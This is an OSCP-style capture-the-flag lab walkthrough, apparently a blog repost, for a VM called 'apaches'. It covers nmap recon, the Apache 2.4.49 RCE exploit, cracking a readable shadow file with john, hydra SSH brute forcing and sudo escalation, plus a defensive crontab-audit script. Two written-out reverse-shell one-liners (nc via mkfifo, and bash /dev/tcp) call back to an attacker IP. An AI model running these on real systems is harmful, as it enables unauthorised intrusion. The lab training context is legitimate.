【OSCP】apaches

admin, 2024-05-24 20:36:22
OSCP lab

Lab overview

apaches

easy

Apache RCE, crontab privilege escalation, hydra usage, SSH brute forcing, nano privilege escalation, sudo privilege escalation

Information gathering

Host discovery

Port scanning

└─# nmap -sV -A -p- -T4 192.168.31.232
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 00:04 EST
Nmap scan report for 192.168.31.232
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bc:95:83:6e:c4:62:38:b5:a9:94:0c:14:a3:bf:57:34 (RSA)
| 256 07:fa:46:1a:ca:f3:dc:08:2f:72:8c:e2:f2:2e:32:e5 (ECDSA)
|_ 256 46:ff:72:d5:67:c5:1f:87:b1:35:84:29:f3:ad:e8:3a (ED25519)
80/tcp open http Apache httpd 2.4.49 ((Unix))
|_http-title: Apaches
|_http-server-header: Apache/2.4.49 (Unix)
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:B2:79:A9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.46 ms 192.168.31.232

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Directory scanning

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.232  -x php,html,txt -e

Gaining access

searchsploit shows that Apache 2.4.49 has an RCE.

/50383.sh ip.txt  /bin/sh 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.181 8888 >/tmp/f'

The team has four members and four accounts.

Privilege escalation

Download linpeas.sh and run a scan; it shows that the shadow file is readable.

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

This yields a hint.

The crontab shows that the backup.sh script is executed as the sacagawea account, and we have write permission to it.

After writing a reverse shell into it, we escalate to the sacagawea user and obtain the first flag.

/bin/bash -i >& /dev/tcp/192.168.31.181/8888 0>&1
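The crontab finding above comes down to a scheduled job whose script can be modified by an account other than the one it runs as. As an added example (not from the original write-up), this Python audit parses /etc/crontab-style text and reports job files that are group- or world-writable, owned by a different user, or sitting in a world-writable directory; the rotate.sh name, the file modes and the crontab lines in demo() are constructed.

```python
import os, pwd, stat, tempfile

def cron_entries(text):
    """Yield (user, argv) for each job line in /etc/crontab-style text."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue                      # blank, comment, or VAR=value line
        skip = 1 if fields[0].startswith("@") else 5   # @reboot vs. m h dom mon dow
        if len(fields) > skip + 1:
            yield fields[skip], fields[skip + 1:]

def audit(text, uid_of=lambda name: pwd.getpwnam(name).pw_uid):
    """Return (cron_user, path, reasons) for job files others could modify."""
    findings = []
    for user, argv in cron_entries(text):
        for path in argv:
            if not (path.startswith("/") and os.path.isfile(path)):
                continue
            st, reasons = os.stat(path), []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_uid not in (0, uid_of(user)):
                reasons.append("owned by a different user")
            dmode = os.stat(os.path.dirname(path)).st_mode
            if dmode & stat.S_IWOTH and not dmode & stat.S_ISVTX:
                reasons.append("parent directory world-writable")
            if reasons:
                findings.append((user, path, reasons))
    return findings

def demo():
    """Constructed sample: one loose script, one tight script, one crontab."""
    d = tempfile.mkdtemp()
    loose, tight = os.path.join(d, "backup.sh"), os.path.join(d, "rotate.sh")
    for path, mode in ((loose, 0o777), (tight, 0o750)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = (f"SHELL=/bin/sh\n# constructed entries\n"
               f"*/5 * * * * sacagawea {loose}\n@daily sacagawea {tight}\n")
    me = os.getuid()   # assumption: treat the current user as the cron user
    return audit(crontab, uid_of=lambda name: me)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, pass the contents of /etc/crontab and the files under /etc/cron.d to audit() and leave uid_of at its default so ownership is checked against the actual account.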

Account credentials are found in the directory.

With the password in hand, hydra is used to brute-force the other users.

Using sudo, we successfully escalate to the gernimo account.

From here, sudo is used directly to escalate to root.

End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】apaches

  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work): 【OSCP】apaches https://cn-sec.com/archives/2775405.html
